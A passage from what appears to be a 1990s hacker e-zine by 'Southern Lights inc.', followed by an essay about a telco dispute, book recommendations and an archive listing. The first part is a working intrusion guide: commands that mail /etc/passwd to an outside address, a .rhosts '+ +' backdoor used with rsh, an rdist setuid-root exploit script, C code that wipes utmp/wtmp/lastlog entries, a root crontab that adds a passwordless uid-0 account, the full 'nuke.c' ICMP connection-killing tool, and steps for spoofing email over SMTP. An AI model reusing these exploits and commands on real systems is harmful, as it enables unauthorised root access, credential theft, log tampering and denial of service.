  869. quence of letters/numbers/symbols and compare them to the passsword file.
  870. Luckily there are programs that do this.  They DON'T go "aaaaa aaaab aaaac..".
  871. What you get is a dictionary file which looks like this:
  872.  
  873.  
  874. autistic
  875. auto
  876. autobiography
  877. autoclave
  878. autocollimate
  879. autocorrelate
  880. autocracy
  881. autocrat
  882. autocratic
  883. autograph
  884. automat
  885. automata
  886. automate
  887. automatic
  888.  
  889.  
  890. The reason for this - using dictionary words - is that a LOT of people just
  891. use common words as their passwords.  Having to attack "Crack" using every
  892. number/letter/symbol sequence UNIX can handle would take a LONG time.
  893.  
  894. The names of some good proggies that crack these passwords are:
  895.  
  896.  
  897. Program Name     File Name               <> OS
  898. ~~~~~~~~~~~~     ~~~~~~~~~               ~~~~~
  899. Cracker Jack     jack13.zip/jack.zip     <PC Only - VERY FAST!!>
  900. Killer Cracker   kc9??.zip               <Anything.  After all, you get the
  901.                                          source to it>
  902.  
  903.  
  904. Useful commands to type WHENEVER you get onto ANY UNIX system:
  905.  
  906. [] = Don't type - instructions
  907. *  = What you type
  908.  
  909. This will "type" the password file to your terminal:
  910. [open a capture if on a modem link]
  911. *cat /etc/passwd        [or]
  912. *ypcat passwd
  913.  
  914. This will mail you via internet with the password file:
  915. *cat /etc/passwd |mail -s passwordfile [where you want to send the file to via
  916.                                       internet mail; ie. bloggs@some.where.com]
  917. ypcat passwd | mail -s passwordfile [where you want to send the file to via
  918.                                        internet mail; ie.bloggs@some.where.com]
  919.  
  920. Also type this:
  921.  
  922. *echo + + >> ~/.rhosts
  923.  
  924. This will allow you (if it's installed) for you to type:
  925.  
  926. *rsh <system.name.you.echoed.that.to> -l <UsernameOfUserYouUsed> /bin/sh -i
  927.  
  928. Okay, so that is say, the user you echoed + + on was called "bob" on
  929. lame.aol.com, you would type:
  930.  
  931. *rsh lame.aol.com -l bob /bin/sh -i
  932.  
  933. This might or might not work, depending on how the system is setup, but if
  934. you were on lame.aol.com, it's a reasonable bet after typing that command you
  935. would then become bob with his rights, and access to his files.
  936.  
  937. Well I thought about it and decided to put some useful source in here for
  938. those interested.
  939.  
  940.  
  941. Okay, this piece of shell script on non-patched systems will give you root.
  942. Upload this file into a directory as <filename>.
  943.  
  944. When in shell on the UNIX box type:
  945.  
  946. *chmod 777 <filename>
  947. *./<filename>
  948. */tmp/." "
  949.  
  950. If a # appears, type:
  951. *whoami
  952.  
  953. If it says "root" you have root on that UNIX box.
  954.  
  955.  
  956. NB:  Because of the way this file is, where ! is wrap the nextline onto that
  957.      line and delete the "!" - except for the "#!" on the first line.
  958.  
  959.  
  960. ---------------------------CUT----------------------------8<------------------
  961. #!/bin/sh
  962. SUID=/tmp/." "
  963. cat <<_EOF_ > test
  964. Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  965. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  966. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  967. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  968. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  969. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  970. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  971. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  972. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  973. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  974. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  975. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
  976. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  977. Qaaaaaaaaaaaaaaaaaaaaaaaaaa
  978. Qaaaaaaaaaaaaaaaaaaaaaaaaa
  979. Qaaaaaaaaaaaaaaaaaaaaaaaa
  980. Qaaaaaaaaaaaaaaaaaaaaaaa
  981. Scp /bin/sh $SUID
  982. Schmod 4755 $SUID
  983. _EOF_
  984. cat test | /usr/ucb/rdist -Server localhost
  985. rm -rf test
  986. if [ -f $SUID ]; then
  987. echo "$SUID is a  setuid shell. "
  988.  fi
  989.  
  990. -------------------------CUT-------------------------------8<------------------
  991.  
  992. The program following will hide you on a UNIX box.
  993.  
  994. It will work on SunOS 4.+ if you are a normal user and utmp has o+w, or if
  995. you are root.
  996.  
  997. -------------------------CUT-------------------------------8<------------------
  998.  
  999. #include <sys/types.h>
  1000. #include <stdio.h>
  1001. #include <unistd.h>
  1002. #include <fcntl.h>
  1003. #include <utmp.h>
  1004. #include <lastlog.h>
  1005. #include <pwd.h>
  1006.  
  1007. int f;
  1008.  
  1009. void kill_tmp(name,who)
  1010. char *name,
  1011.      *who;
  1012. {
  1013.     struct utmp utmp_ent;
  1014.  
  1015.   if ((f=open(name,O_RDWR))>=0) {
  1016.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  1017.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  1018.                  bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  1019.                  lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  1020.                  write (f, &utmp_ent, sizeof (utmp_ent));
  1021.             }
  1022.      close(f);
  1023.   }
  1024. }
  1025.  
  1026. void kill_lastlog(who)
  1027. char *who;
  1028. {
  1029.     struct passwd *pwd;
  1030.     struct lastlog newll;
  1031.  
  1032.      if ((pwd=getpwnam(who))!=NULL) {
  1033.  
  1034.         if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
  1035.             lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  1036.             bzero((char *)&newll,sizeof( newll ));
  1037.             write(f, (char *)&newll, sizeof( newll ));
  1038.             close(f);
  1039.         }
  1040.  
  1041.     } else printf("%s: ?\n",who);
  1042.  
  1043. }
  1044. main(argc,argv)
  1045. int  argc;
  1046. char *argv[];
  1047. {
  1048.     if (argc==2) {
  1049.         kill_tmp("/etc/utmp",argv[1]);
  1050.         kill_tmp("/usr/adm/wtmp",argv[1]);
  1051.         kill_lastlog(argv[1]);
  1052.         printf("Zap!\n");
  1053.     } else
  1054.     printf("Error.\n");
  1055. }
  1056.  
  1057. -----------------------------CUT---------------------------8<------------------
  1058.  
  1059.  
  1060. When you get root, find where the crontabs are put, and type this:
  1061. *cat <WhatYouCallThisFileName> >> <crontabdir>/root
  1062.  
  1063. -------------->8--------------Cuthere------------------------------------------
  1064. 0 1 * * * cp /etc/passwd /var/adm/". "
  1065. 1 1 * * * chmod +w /etc/passwd
  1066. 2 1 * * * echo "blah::0:0:A tempory account:/:/bin/sh" >> /etc/passwd
  1067. 1 2 * * * mv /var/adm/". " /etc/passwd
  1068. 2 2 * * * chmod -w /etc/passwd
  1069. -------------->8--------------Cuthere------------------------------------------
  1070.  
  1071. At 1-2 AM, there will be an account called "blah" with root access every day
  1072. created with no password.
  1073.  
  1074.  
  1075. This will nuke the IP connection between two computers:
  1076.  
  1077. *./nuke <TargetUsers> <ComputerThat'sConnectingTargetComputer> <Port#ToKill>
  1078.  
  1079. -------------->8--------------Cuthere------------------------------------------
  1080. /*
  1081.  *  nuke.c version 1.0 04/25/92
  1082.  *    by Satanic Mechanic.
  1083.  *  must be root to open raw sockets. this version will kill
  1084.  *  almost any ip connection.
  1085.  *  ----------------------------------------------------------------
  1086.  *  I strongly advise against even compiling this software. It's far
  1087.  *  too dangerous, and the temptation may be there to do some real
  1088.  *  damage with it.  Read and learn, that's it, eh?  -concerned
  1089.  *  ----------------------------------------------------------------
  1090.  *
  1091.  */
  1092.  
  1093. #include <netdb.h>
  1094. #include <sys/time.h>
  1095. #include <sys/types.h>
  1096. #include <sys/socket.h>
  1097. #include <netinet/in.h>
  1098. #include <netinet/in_systm.h>
  1099. #include <netinet/ip.h>
  1100. #include <netinet/ip_icmp.h>
  1101. #include <netinet/tcp.h>
  1102. #include <signal.h>
  1103. #include <errno.h>
  1104. #include <string.h>
  1105. #include <stdio.h>
  1106. #define DEFAULT_UNREACH ICMP_UNREACH_PORT
  1107.  
  1108. char *icmp_unreach_type[] = {
  1109.     "net",
  1110.     "host",
  1111.     "protocol",
  1112.     "port",
  1113.     "frag",
  1114.     "source",
  1115.     "destnet",
  1116.     "desthost",
  1117.     "isolated",
  1118.     "authnet",
  1119.     "authhost",
  1120.     "netsvc",
  1121.     "hostsvc"
  1122. };
  1123.  
  1124. #define MAX_ICMP_UNREACH (sizeof(icmp_unreach_type)/sizeof(char *))
  1125.  
  1126. int resolve_unreach_type(arg)
  1127.     char *arg;
  1128. {
  1129.     int i;
  1130.  
  1131.     for (i=0; i <MAX_ICMP_UNREACH; i++) {
  1132.         if (!strcmp(arg,icmp_unreach_type[i])) return i;
  1133.     }
  1134.     return -1;
  1135. }
  1136.  
  1137. int resolve_host (host,sa)
  1138.     char *host;
  1139.     struct sockaddr_in *sa;
  1140. {
  1141.     struct hostent *ent ;
  1142.  
  1143.     bzero(sa,sizeof(struct sockaddr));
  1144.     sa->sin_family = AF_INET;
  1145.     if (inet_addr(host) == -1) {
  1146.         ent = gethostbyname(host);
  1147.         if (ent != NULL) {
  1148.             sa->sin_family = ent->h_addrtype;
  1149.             bcopy(ent->h_addr,(caddr_t)&sa->sin_addr,ent->h_length);
  1150.             return(0);
  1151.         }
  1152.         else {
  1153.             fprintf(stderr,"error: unknown host %s\n",host);
  1154.             return(-1);
  1155.         }
  1156.     }
  1157.     return(0);
  1158. }
  1159.  
  1160. in_cksum(addr, len)             /* from ping.c */
  1161. u_short *addr;
  1162. int len;
  1163. {
  1164.         register int nleft = len;
  1165.         register u_short *w = addr;
  1166.         register int sum = 0;
  1167.         u_short answer = 0;
  1168.  
  1169.         /*
  1170.          *  Our algorithm is simple, using a 32 bit accumulator (sum),
  1171.          *  we add sequential 16 bit words to it, and at the end, fold
  1172.          *  back all the carry bits from the top 16 bits into the lower
  1173.          *  16 bits.
  1174.          */
  1175.         while( nleft > 1 )  {
  1176.                 sum += *w++;
  1177.                 nleft -= 2;
  1178.         }
  1179.  
  1180.         /* mop up an odd byte, if necessary */
  1181.         if( nleft == 1 ) {
  1182.                 *(u_char *)(&answer) = *(u_char *)w ;
  1183.                 sum += answer;
  1184.         }
  1185.  
  1186.         /*
  1187.          * add back carry outs from top 16 bits to low 16 bits
  1188.          */
  1189.         sum = (sum >> 16) + (sum & 0xffff);     /* add hi 16 to low 16 */
  1190.         sum += (sum >> 16);                     /* add carry */
  1191.         answer = ~sum;                          /* truncate to 16 bits */
  1192.         return (answer);
  1193. }
  1194.  
  1195. int icmp_unreach(host,uhost,port,type)
  1196.      char *host,*uhost;
  1197.      int type,port;
  1198. {
  1199.     struct sockaddr_in name;
  1200.     struct sockaddr dest,uspoof;
  1201.     struct icmp *mp;
  1202.     struct tcphdr *tp;
  1203.     struct protoent *proto;
  1204.  
  1205.     int i,s,rc;
  1206.     char *buf = (char *) malloc(sizeof(struct icmp)+64);
  1207.     mp = (struct icmp *) buf;
  1208.     if (resolve_host(host,&dest) <0) return(-1);
  1209.     if (resolve_host(uhost,&uspoof) <0) return(-1);
  1210.     if ((proto = getprotobyname("icmp")) == NULL) {
  1211.         fputs("unable to determine protocol number of \"icmp\n",stderr);
  1212.         return(-1);
  1213.     }
  1214.     if ((s = socket(AF_INET,SOCK_RAW,proto->p_proto)) <0 ) {
  1215.         perror("opening raw socket");
  1216.         return(-1);
  1217.     }
  1218.  
  1219.     /* Assign it to a port */
  1220.     name.sin_family = AF_INET;
  1221.     name.sin_addr.s_addr = INADDR_ANY;
  1222.     name.sin_port = htons(port);
  1223.  
  1224.     /* Bind it to the port */
  1225.     rc = bind(s, (struct sockaddr *) & name, sizeof(name));
  1226.     if (rc == -1) {
  1227.       perror("bind");
  1228.       return(-1);
  1229.     }
  1230.  
  1231.     if ((proto = getprotobyname("tcp")) == NULL) {
  1232.         fputs("unable to determine protocol number of \"icmp\n",stderr);
  1233.         return(-1);
  1234.     }
  1235.  
  1236.     /* the following messy stuff from Adam Glass (icmpsquish.c) */
  1237.     bzero(mp,sizeof(struct icmp)+64);
  1238.     mp->icmp_type = ICMP_UNREACH;
  1239.     mp->icmp_code = type;
  1240.     mp->icmp_ip.ip_v = IPVERSION;
  1241.     mp->icmp_ip.ip_hl = 5;
  1242.     mp->icmp_ip.ip_len = htons(sizeof(struct ip)+64+20);
  1243.     mp->icmp_ip.ip_p = IPPROTO_TCP;
  1244.     mp->icmp_ip.ip_src = ((struct sockaddr_in *) &dest)->sin_addr;
  1245.     mp->icmp_ip.ip_dst = ((struct sockaddr_in *) &uspoof)->sin_addr;
  1246.     mp->icmp_ip.ip_ttl = 179;
  1247.     mp->icmp_cksum = 0;
  1248.     tp = (struct tcphdr *)   ((char *) &mp->icmp_ip+sizeof(struct ip));
  1249.     tp->th_sport = 23;
  1250.     tp->th_dport = htons(port);
  1251.     tp->th_seq = htonl(0x275624F2);
  1252.     mp->icmp_cksum = htons(in_cksum(mp,sizeof(struct icmp)+64));
  1253.     if ((i= sendto(s,buf,sizeof(struct icmp)+64, 0,&dest,sizeof(dest))) <0 ) {
  1254.         perror("sending icmp packet");
  1255.         return(-1);
  1256.     }
  1257.     return(0);
  1258. }
  1259.  
  1260. void main(argc,argv)
  1261.      int argc;
  1262.  
  1263.      char **argv;
  1264. {
  1265.  
  1266.     int i, type;
  1267.  
  1268.     if ((argc <4) || (argc >5)) {
  1269.         fprintf(stderr,"usage: nuke host uhost port [unreach_type]\n");
  1270.         exit(1);
  1271.     }
  1272.  
  1273.     if (argc == 4) type = DEFAULT_UNREACH;
  1274.     else type = resolve_unreach_type(argv[4]);
  1275.  
  1276.     if ((type <0) ||(type >MAX_ICMP_UNREACH)) {
  1277.         fputs("invalid unreachable type",stderr);
  1278.         exit(1);
  1279.     }
  1280.     if (icmp_unreach(argv[1],argv[2],atoi(argv[3]),type) <0) exit(1);
  1281.     exit(0);
  1282. }
  1283.  
  1284. ---------------->8-------------------------------------------------------------
  1285.  
  1286.  Well, this is the smallest stuff I have, and I'm not gonna BORE you with
  1287.  kbyte's and kbyte's of source.
  1288.  
  1289.  
  1290.  
  1291.  
  1292.  
  1293.                                    SLi
  1294.  
  1295.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1296.                 ^^^^^                                ^^^^^
  1297.               ^^^^^          Busted for nothing        ^^^^^
  1298.                 ^^^^^                                ^^^^^
  1299.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1300.  
  1301.                              Southern Lights
  1302.                                    inc.
  1303.  
  1304.  
  1305.  
  1306.  
  1307. Okay, I am being forced to type this by gun-point.. okay, maybe not to that
  1308. extreme, but it's pretty damn close!  We accept no responsibility for the
  1309. writing of this article... Can I say that? No, I guess not.. oh well, I
  1310. tried... =)
  1311.  
  1312. For months we were receiving hundreds of dollars worth of bills through
  1313. Telecom for calls we didn't make.  For example, a $300 phone call when I
  1314. was on holiday - there wasn't anyone home, so how could someone have had a
  1315. conversation if there wasn't anyone home to accept the phone call?
  1316.  
  1317. [NOTE:  There isn't a pill box located anywhere NEAR my house, so don't go
  1318. screaming BEIGE BOXING!! - mind you, I had this weird dream that I had this
  1319. cute little pill box with wires sticking out of it which was right outside
  1320. of our house.  Ohmigod, I think I must be going crazy... ANYway..]
  1321.  
  1322. These were directed through NZ-Direct from the US.  Strange that.  No one
  1323. had been over to the states recently and it hadn't stated that it was by
  1324. using a calling card, so that option was out.  So, that required a monthly
  1325. scream at Telco about that, and eventually we stopped getting billed for
  1326. such calls (which I doubt even existed anyway).
  1327.  
  1328. Okay, now that's just the TIP of the iceburg.  How would you like to be "con-
  1329. victed" for a "crime" you didn't commit?  Well, that's basically what happen-
  1330. ed.  And it was such a PETTY crime at that.  Try VMB hacking!
  1331.  
  1332. It all started when we discovered a little VMB and everyone else happened to
  1333. find it too.  What a coincidence.. *grin*  Many of their boxes had the de-
  1334. fault passwords still attatched to them *sigh*.  It's pathetic the way some
  1335. companies leave their systems so open and then blame someone else for "abusing
  1336. their system" when all we did was look around.  Someone had editted the voice
  1337. prompts ['twasn't me, but you know who you are... *grin*] and _I_ ended up
  1338. taking the blame... hmm.. Anyway, a few of us ended up being "interrogated"
  1339. over this stupid prompt editting and leaving "abusive messages".
  1340.  
  1341. Anyway, the outcome was, I ended up being the only person accepting respon-
  1342. sibility for the entire incident.  That included me having to write two let-
  1343. ters.  Two copies of one letter - one copy to the guy who owned the VMB and
  1344. the other copy to the head of Telco security "for scrutiny" - and another
  1345. letter to the head of Wellington Telco security explaining the entire incident.
  1346.  
  1347. In the end, it was a waste of time not only for me - having to write two
  1348. letters - that didn't count the FIRST letter explaining why I shouldn't have
  1349. my phone line disconnected (they sent a letter to me saying that if I didn't
  1350. respond within a month, or summink, they'd disconnect it anyway - bunch o'
  1351. pricks, huh?).
  1352.  
  1353. In my final letter to the head of Wellington Telco Security, I reminded them
  1354. of the hundreds of dollars worth of calls I had to complain about each month.
  1355. FINALLY, something was actually done about it, and the hundred dollars worth
  1356. of calls were credited to my account.
  1357.  
  1358. The stupid thing was that I didn't do a thing, and had to put up with all the
  1359. crap that they threw at me.  I also had my 3-way call cancelled.
  1360.  
  1361. In conclusion (they always said you have to include one in essays so I'd bet-
  1362. ter get extra practice =) ), I'd just like to say that they're a bunch of
  1363. dorks.  Oh, and the new telephone account layout really sucks too.
  1364. [CyntaxEra Mature Mode: ON] *grin* In my opinon, it was better the way it
  1365. was, but that doesn't matter, does it?  It's probably cheaper for them to do
  1366. it the new way.  That would explain it all... =)
  1367.  
  1368.  
  1369.  
  1370.  
  1371.                                    SLi
  1372.  
  1373.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1374.                 ^^^^^                                ^^^^^
  1375.               ^^^^^            Books 2 Read            ^^^^^
  1376.                 ^^^^^                                ^^^^^
  1377.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1378.  
  1379.                              Southern Lights
  1380.                                    inc.
  1381.  
  1382.  
  1383.  
  1384.  
  1385.     Title                                Author              Stars
  1386.     =================================================================
  1387.  
  1388.     The Fools Run ...................... John Camp           *****
  1389.     Complicity    ...................... Iain Banks          ****
  1390.     War Day       ...................... Strieber & Kunetka  *****
  1391.     Blood Music   ...................... Greg Bear           ****?
  1392.  
  1393.  
  1394.  
  1395.  
  1396.  
  1397.  
  1398.                                    SLi
  1399.  
  1400.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1401.                 ^^^^^                                ^^^^^
  1402.               ^^^^^    The SLi Archive Subject list    ^^^^^
  1403.                 ^^^^^                                ^^^^^
  1404.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1405.  
  1406.                              Southern Lights
  1407.                                    inc.
  1408.  
  1409.  
  1410. Okay, this is the list of all <well, most of> the file areas in the SLi
  1411. archives.  It's a direct copy of the "/pub/README.NOW!" file and is up to
  1412. date as of the release date.
  1413.  
  1414. -sof-
  1415.  
  1416.  
  1417.                      Welcome to the SLi archives!
  1418.             We hope your stay is, err, umm, "enlightening".
  1419.  
  1420.  
  1421.   The operator of this system takes no responsibility for how the information
  1422.   is used, BUT suggests STRONGLY you do NOT try ANYTHING, ANY of the files
  1423.   describe! Some acts depicted in the files held within this archive describe
  1424.   illegal or immoral acts.  PLEASE use your commonsense when defining right
  1425.   from wrong.
  1426.  
  1427.   This archive exists to be a library of information, to show people a dif-
  1428.   ferent outlook on the world and, in truth, a different outlook on life to
  1429.   give them the opportunity to delve into the realms of adventure and know-
  1430.   ledge - NOT to insight or teach people how to break the law.
  1431.  
  1432.  
  1433.  
  1434. Directories   Sub Directories        Description
  1435. -----------+-------------------+-------------------------------------------
  1436. ./ai                                 Artificial Intellegence.
  1437. ./anarchy                            Anarchy files, explosives etc.  (Likly
  1438.                                      not to be here anymore as I'm against
  1439.                                      this kinda shit now)
  1440. ./art                                Art.
  1441.             ansi                     If I find ppl up'ing ANSI, I'll shoot
  1442.                                      them.
  1443.             ascii                    Better than ANSI, I guess.
  1444.             vt-xxx                   VT Animations at present.
  1445. ./bbs
  1446.             bbs-adds                 BBS adverts - numbers etc..
  1447.                     au
  1448.                     nz
  1449.                     other
  1450.                     uk
  1451.                         usa
  1452.         misc
  1453. ./busts                              Info on different busts.
  1454. ./cc                                 Info on creadit/calling cards, ATMs
  1455.                                      etc.
  1456. ./civil                              Civil liberties
  1457. ./cons                               Conferences for H/P people - where when,
  1458.                                      what happened and confs to come.
  1459. ./corewars                           Files for Core Wars.
  1460. ./cryptography                       Encrypting and Decrypting.
  1461. ./cyber                              The world of the Cyberpunk.
  1462. ./eff                                Information on the Electronic Freedom
  1463.                                      Foundation - a US civial rights group.
  1464. ./faq                                General Frequently Asked Questions.
  1465. ./history                            A MUST to read you HAVE to read these
  1466.                                      files they are linked to other direct-
  1467.                                      ories all over the SLi archive but they
  1468.                                      contain a history of different events in
  1469.                                      the H/P world.
  1470. ./howto                              How-to Guides to misc computer related
  1471.                                      activities.
  1472. ./incoming                           Incoming files.
  1473. ./info                               These files are also contained in other
  1474.                                      places. In this archive but are here be-
  1475.                                      cause they should be read and because
  1476.                                      in my opinion, they are important.
  1477. ./internet                           Internet related files.
  1478.             irc                      Internet Relay Chat [IRC] files.
  1479.             sites                    Different FTP/TELNET sites.
  1480. ./misc                               Just a lot of misc stuff with no real
  1481.                                      home.
  1482.             bible                    Obviously, the Bible.
  1483. ./mischp                             Misc Hack/Phreak files.
  1484.             cable                    Files to do with Cable TV/SKY.
  1485.             lockpick                 Lock-picking related files.
  1486. ./music                              Music related stuff.
  1487.             lyrics                   Lyrics for songs etc.
  1488.             misc                     Misc music related files.
  1489.             mods                     Electronic music - most powerpacked for
  1490.                                      Amiga.
  1491.             vocs                     PC Sound files.
  1492. ./nz                                 New Zealand related files!
  1493. ./passwds                            Password files for different systems.
  1494.                                      Please rename the password file to be
  1495.                                      "systemname-dd-mm-yy".
  1496.                                      ie.
  1497.                                      lamesystem-01-02-95.
  1498. ./pharm                              Drug files (also probably going to be
  1499.                                      removed for the same reason as
  1500.                                      "anarchy")
  1501. ./phreak                             Information on the Telephone System.
  1502.             box                      Different phreaking "boxes".
  1503.             cellfone                 Cellular Fones.
  1504.             countrycodes             Every Area/Country Code in the world.
  1505.             fone-fraud               Misc files on fone-fraud written by
  1506.                                      Telco/Schools.
  1507.             history                  History of the Telefone
  1508.         misc                     Misc Files.
  1509.             miscexe                  Misc Executables.
  1510.             payfones                 Payphone related files.
  1511.         pbx                      Private Branch eXchanges [PBXs].
  1512.             standards                Different CCITT/Phone Standards.
  1513.         vmb                      Voice Mail Boxes [VMBs].
  1514. ./pirate                             Breaking the (c) protection of S/W.
  1515.             amiga
  1516.                         crack
  1517.                         coding
  1518.         ibm
  1519.             mac
  1520. ./police                             Understand thy opposition
  1521.             misc                     Miscellaneous files on the police.
  1522. ./publications                       Different files from well-known authors
  1523.                                      or organisations.
  1524.             bruce_sterling           Includes The Hacker Crackdown and inside
  1525.                                      directories FSF_columns, catscan and
  1526.                                      interzone.
  1527.             david_faber
  1528.             denning
  1529.             john_gilmore             Includes inside directories
  1530.                                      Gilmore_v_NSA and inside that,
  1531.                                      Clipper_FOIA and ITAR_FOIA.
  1532.             john_perry_barlow
  1533.             kapor
  1534.             unsorted                 Miscellaneous unsorted publications.
  1535. ./security                           Computer Security, Bug fixes and security.
  1536.                                      hole descriptions.
  1537.             8lgm                     Unix bugs
  1538.             cert                     Computer Emergency Response Co-ordination
  1539.                                      Centre.
  1540.                    cert_advisories   A LOT of system security holes
  1541.                    clippings         Misc clippings from diffrent usenet
  1542.                                      sources.
  1543.                    misc              Misc info.
  1544.         dos                         DOS <PC> security files.
  1545.                    novell            Novell netware.
  1546.                    tools             Misc tools for DOS.
  1547.             faq                      Frequently Asked Questions.
  1548.             mac                      Misc files for the Macintosh.
  1549.             misc                     Misc files on Computer Security.
  1550.             os2                      Files for OS2.
  1551.             unix                     Files for UNIX based OS's.
  1552.                    antihacktools     Anti-Hacker Tools
  1553.                    hackerssrc        Various source for you hackers.
  1554.                    hp                Files for hacking the Hewlett-Packard's
  1555.                                      HPX000's.
  1556.                    vax               Vax/Digital/VMS Security.
  1557.             x.25                 x.25 security holes
  1558. ./sli                                Southern Lights inc. File Areas.
  1559.             articles
  1560.             interest                 Files that are related to SLi and are
  1561.                                      an intrest to the rest of the H/P world
  1562.             mags                     The SLi Mags are stored here.
  1563.         warnings                 READ any files in here!
  1564. ./strange                            Weird files that should have no place
  1565.                                      to go :)
  1566.         occult                   Stuff on the occult <black magic etc..>
  1567.         ufo                      UFO files.
  1568. ./system                             Files for different OS's.
  1569.         amiga
  1570.                           asm
  1571.                       utils
  1572.         dos
  1573.             linux
  1574. ./txts                               Like misc really.
  1575. ./usenet                             Files/Msgs from usenet.
  1576. ./virus                              Virus Creators and virus code. Any anti-
  1577.                                      virus people feel free to use this info
  1578.                                      to create virus killers.
  1579. ./words                              Word files.
  1580. ./zines                              Electronic Mags.
  1581.         hpa                      Hacking, Phreaking and Anarchy Mags.
  1582.              other                    Don't fit anywhere.
  1583.              weird                    Very weird.
  1584.  
  1585.  
  1586.  
  1587. TOTAL DISK SPACE USED:               79055Kbytes [compressed]
  1588.                                      Approximately 200Meg [uncompressed]    
  1589.  
  1590. As of recent times, we have been updating the system at 1-2 Meg per day.
  1591. However, this cannot continue, as we have but 40Meg available disk space
  1592. remaining, but if anyone is willing to donate an IDE drive, we will be most
  1593. appreciative.
  1594.  
  1595. NOTE:  The use of the word "removed" is being used as in "access to these
  1596.        files will be removed from normal access users".
  1597.  
  1598.  
  1599.  
  1600.  
  1601.  
  1602.  
  1603.                                    SLi
  1604.  
  1605.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1606.                 ^^^^^                                ^^^^^
  1607.               ^^^^^             Fake Mail              ^^^^^
  1608.                 ^^^^^                                ^^^^^
  1609.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1610.  
  1611.                              Southern Lights
  1612.                                    inc.
  1613.  
  1614.  
  1615.  
  1616.   Well, I dont know WHY this is in here, but just in case your interested
  1617.   and DIDN'T know how to send fake Internet E-Mail here is a step by step
  1618.   way to do it.
  1619.  
  1620.  
  1621.   KEY:  ignore []'s
  1622.         *'s are lines that you type
  1623.  
  1624.  
  1625. type "telnet [target.comp] 25" at $prompt.
  1626.  
  1627. Trying [target.comp]...
  1628. Connected [target.comp].
  1629. Escape character is '^]'.
  1630. 220-[target comp] [Mailer/Version] ready at [date/time]
  1631. 220 ESMTP spoken here
  1632. *helo [where.from.comp]
  1633. 250 [Target.comp] Hello [where.from.comp] [###.###.###], pleased to meet you
  1634. *mail from: [where@ever.you.like]
  1635. 250 [where@ever.you.like]... Sender ok
  1636. *rcpt to: [target@target.comp]
  1637. 250 [target@Target.comp]... Recipient ok
  1638. *data
  1639. 354 Enter mail, end with "." on a line by itself
  1640. *hello
  1641. *.
  1642. 250 DAA28466 Message accepted for delivery
  1643. *quit
  1644. 221 [Target.Comp] closing connection
  1645. Connection closed by foreign host.
  1646. $
  1647.  
  1648.  Well there you have it.  Nice and easy.  If you didnt know it already, I'm
  1649.  a bit disappointed, but that's what we are here for.  To teach YOU.
  1650.  
  1651.  
  1652.  
  1653.  
  1654.                                    SLi
  1655.  
  1656.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1657.                 ^^^^^                                ^^^^^
  1658.               ^^^^^   Elements of Data Deprotection     ^^^^^
  1659.                 ^^^^^                                ^^^^^
  1660.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  1661.  
  1662.                              Southern Lights
  1663.                                    inc.
  1664.  
  1665.  
  1666.  
  1667. Elements of Data Deprotection - by Thorium
  1668.  
  1669. Data Deprotection is one of my many hobbies.   Others include bomb making,
  1670. programming, hacking, shooting, phreaking and appearing in court.
  1671.  
  1672. I am by no means an expert in this field, in fact I would regard myself as
  1673. a "seasoned ammeter".  However, I feel that some tips I have picked up
  1674. over the years could help others.  For this reason I am writing this file.
  1675.  
  1676. HOLD IT!  You can't program?  Well, this won't be much good to ya.  You
  1677. might even need to know some assembler on whatever platform you use.  I use
  1678. Amiga's usually (because they are simply the best personal computer - well
  1679. for assembler programmers anyway) so I know a fair bit of 68000 assembler.
  1680. It also helps to know a few common opcodes (what the actual text of
  1681. assembler language gets turned into, ie machine language) and how to use a
  1682. good debugger and disassembler.
  1683.  
